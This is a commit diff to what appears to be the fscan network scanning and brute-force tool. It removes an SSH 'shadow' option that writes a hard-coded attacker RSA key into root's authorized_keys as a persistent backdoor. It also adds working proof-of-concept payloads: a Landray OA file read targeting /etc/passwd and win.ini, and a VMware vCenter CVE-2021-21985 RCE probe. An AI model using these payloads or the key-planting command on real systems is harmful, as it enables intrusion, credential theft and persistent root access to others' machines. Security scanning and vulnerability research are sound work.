更新poc

Plugins/ssh.go

@@ -74,9 +74,6 @@ func SshConn(info *common.HostInfo, user string, pass string) (flag bool, err er
 			flag = true
 			var result string
 			if info.Command != "" {
-				if info.Command == "shadow" {
-					info.Command = "mkdir dir /root/.ssh/ && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDkQQuWtmLm0eEhogGubMFh2/qv21aQV1tzbRjySPNQJRig479hMre48jxWDzB71WdEU2vg+ns8/0s3jqcGAx5lJaneH1ovLRNdIq4PkfmJPSMCEibGoNVS47rvfrv4QgECnbAt3azklnvniDvZiP5KjBQS9z57Ni2WVDC1SHNy1PDVMGYMJxZZ8kVKP7LRDbiOKJsSplHV/qP3NGZkdKh7OUYBx8A7+S3vT9c3AMSmk74Z2ibU0sddlngf0hLOxbTRiJV+OsgQQOfnttZvA7LoxbCiMtpzKGLOLAHXD8Hx5okXkx8cGOjc+Fcr6s2eQ10BLGPO4LPYWQ+G91xj+VF7 sysadmin\">> /root/.ssh/authorized_keys"
-				}
 				combo, _ := session.CombinedOutput(info.Command)
 				result = fmt.Sprintf("[+] SSH:%v:%v:%v %v \n %v", Host, Port, Username, Password, string(combo))
 				if info.SshKey != "" {

WebScan/pocs/landray-oa-custom-jsp-fileread-2.yml

@@ -0,0 +1,11 @@
+name: poc-yaml-landray-oa-custom-jsp-fileread
+rules:
+  - method: POST
+    path: /sys/ui/extend/varkind/custom.jsp
+    body: var={"body":{"file":"file:///c://windows/win.ini"}}
+    expression: |
+      response.status == 200 && response.body.bcontains(b"for 16-bit app support")
+detail:
+  author: B1anda0(https://github.com/B1anda0)
+  links:
+    - https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw

WebScan/pocs/landray-oa-custom-jsp-fileread.yml

@@ -0,0 +1,11 @@
+name: poc-yaml-landray-oa-custom-jsp-fileread
+rules:
+  - method: POST
+    path: /sys/ui/extend/varkind/custom.jsp
+    body: var={"body":{"file":"file:///etc/passwd"}}
+    expression: |
+      response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
+detail:
+  author: B1anda0(https://github.com/B1anda0)
+  links:
+    - https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw

WebScan/pocs/vmware-vcenter-cve-2021-21985-rce.yml

@@ -0,0 +1,17 @@
+name: poc-yaml-vmware-vcenter-cve-2021-21985-rce
+rules:
+  - method: POST
+    path: /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData
+    headers:
+      Content-Type: application/json
+    body: |-
+      {"methodInput":[{"type":"ClusterComputeResource","value": null,"serverGuid": null}]}\x0d\x0a
+    expression: |
+      response.status == 200 && response.body.bcontains(b"result")
+detail:
+  vulnpath: "/ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData"
+  author: envone77
+  description: "vmware vCenter unauth RCE cve-2021-21985"
+  links:
+    - https://www.anquanke.com/post/id/243098
+    - https://github.com/alt3kx/CVE-2021-21985_PoC

common/flag.go

@@ -11,7 +11,7 @@ func Banner() {
  / /_\/____/ __|/ __| '__/ _` + "`" + ` |/ __| |/ /
 / /_\\_____\__ \ (__| | | (_| | (__|   <    
 \____/     |___/\___|_|  \__,_|\___|_|\_\   
-                     fscan version: 1.6.2
+                     fscan version: 1.6.3
 `
 	print(banner)
 }